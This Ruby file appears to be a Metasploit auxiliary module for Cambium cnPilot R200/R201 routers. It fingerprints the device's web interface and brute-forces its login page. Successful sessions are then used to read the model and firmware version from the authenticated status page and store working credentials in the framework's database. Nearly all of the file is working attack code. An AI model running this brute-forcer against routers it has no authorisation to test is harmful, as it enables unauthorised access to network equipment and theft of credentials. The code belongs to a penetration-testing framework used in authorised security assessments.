# -*- coding: binary -*-
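module Msf
  ###
  #
  # This module provides methods for working with cnPilot R200/201
  #
  ###

  module Auxiliary::CNPILOT
    include Msf::Exploit::Remote::HttpClient
    include Msf::Auxiliary::AuthBrute
    include Msf::Auxiliary::Report
    include Msf::Auxiliary::Scanner

    # Patterns used to pull the device model and firmware version out of
    # /status/Status_Basic.asp. They encode the page layout the original
    # code matched on and are kept verbatim.
    MODEL_LINE_RE  = /device_name= (.*)/
    MODEL_VALUE_RE = /[$"](.*)[$"]/
    VERSION_RE     = /p;(.*?)[$<\/]/

    #
    # Record a working credential in the database.
    #
    # @param opts [Hash] :ip, :port, :service_name, :user, :password and
    #   optionally :proof; all values are stored as given.
    # @return the result of create_credential_login
    #
    def report_cred(opts)
      service_data = {
        address: opts[:ip],
        port: opts[:port],
        service_name: opts[:service_name],
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :service,
        module_fullname: fullname,
        username: opts[:user],
        private_data: opts[:password],
        private_type: :password
      }.merge(service_data)

      login_data = {
        last_attempted_at: Time.now,
        core: create_credential(credential_data),
        status: Metasploit::Model::Login::Status::SUCCESSFUL,
        proof: opts[:proof]
      }.merge(service_data)

      create_credential_login(login_data)
    end

    #
    # Check if App is Cambium cnPilot
    #
    # Fetches /index.asp and fingerprints the response. On a match the
    # login sweep (run_login) is started before returning.
    #
    # @return [Boolean] true when the target answered like a cnPilot
    #
    def is_app_cnpilot?
      begin
        res = send_request_cgi(
          'uri' => '/index.asp',
          'method' => 'GET'
        )
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
        print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
        return false
      end

      unless cnpilot_page?(res)
        print_error("#{rhost}:#{rport} - Target does not appear to be Cambium cnPilot r200/r201. Module will not continue.")
        return false
      end

      print_good("#{rhost}:#{rport} - Cambium cnPilot confirmed...")
      run_login
      true
    end

    #
    # Brute-force the login page
    #
    # Tries one username/password pair against /goform/websLogin. A
    # redirect to Status_Basic is treated as a successful login; the
    # status page is then fetched to enrich the credential record with
    # the device model and firmware version.
    #
    # @param user [String]
    # @param pass [String]
    # @return [Array(String, String)] session cookie and firmware version
    #   on success, ['skip', 'skip'] when the login failed. The version
    #   is nil when the status page could not be fetched or parsed; the
    #   credential is still reported because the redirect confirmed it.
    #
    def do_login(user, pass)
      print_status("#{rhost}:#{rport} - Attempting to login...")

      res = send_request_cgi(
        'uri' => '/goform/websLogin',
        'method' => 'POST',
        'headers' => {
          'Accept' => 'application/json, text/javascript, */*; q=0.01'
        },
        'vars_post' => {
          'user_name' => user,
          'password' => pass
        }
      )

      # A correct login is answered with a 302 to the status page.
      logged_in = res &&
                  res.code == 302 &&
                  res.headers.include?('Location') &&
                  res.headers['Location'].include?('Status_Basic')

      unless logged_in
        print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
        return 'skip', 'skip'
      end

      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")

      # Extract device model and version from the authenticated status page.
      the_cookie = res.get_cookies
      status_res = fetch_status_page(the_cookie)

      cnpilot_model = nil
      cnpilot_version = nil
      if cnpilot_page?(status_res)
        cnpilot_model = parse_cnpilot_model(status_res.body)
        cnpilot_version = parse_cnpilot_version(status_res.body)
      end

      # Model is optional; version may be nil when parsing failed.
      print_status("Running cnPilot #{[cnpilot_model, cnpilot_version].compact.join(' ')}")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: ['Cambium', cnpilot_model || 'cnPilot', cnpilot_version].compact.join(' '),
        user: user,
        password: pass
      )

      return the_cookie, cnpilot_version
    end

    private

    # True when +res+ is a 200 page served by GoAhead-Webs that carries the
    # Cambium cnPilot markers; shared by the pre-check and the post-login
    # status page validation.
    def cnpilot_page?(res)
      return false unless res && res.code == 200 && res.headers.include?('Server')

      res.headers['Server'].include?('GoAhead-Webs') &&
        res.body.include?('cnPilot') &&
        res.body.include?('style_CAMBIUM.css')
    end

    # GET the authenticated status page using the session cookie returned
    # by the login redirect.
    def fetch_status_page(cookie)
      send_request_cgi(
        'uri' => '/status/Status_Basic.asp',
        'method' => 'GET',
        'cookie' => cookie,
        'headers' => {
          'Accept' => 'application/json, text/javascript, */*; q=0.01'
        }
      )
    end

    # Pull the model name out of the "device_name= ..." line of the status
    # page body; nil when either pattern does not match.
    def parse_cnpilot_model(body)
      line = body.match(MODEL_LINE_RE)
      return nil unless line

      value = line.to_s.match(MODEL_VALUE_RE)
      value && value[1]
    end

    # Pull the firmware version out of div#statusInfo; nil when the div is
    # missing or its text does not match the expected layout.
    def parse_cnpilot_version(body)
      status_div = Nokogiri::HTML(body).at_css('div#statusInfo')
      return nil unless status_div

      version = status_div.text.to_s.match(VERSION_RE)
      version && version[1]
    end
  end
end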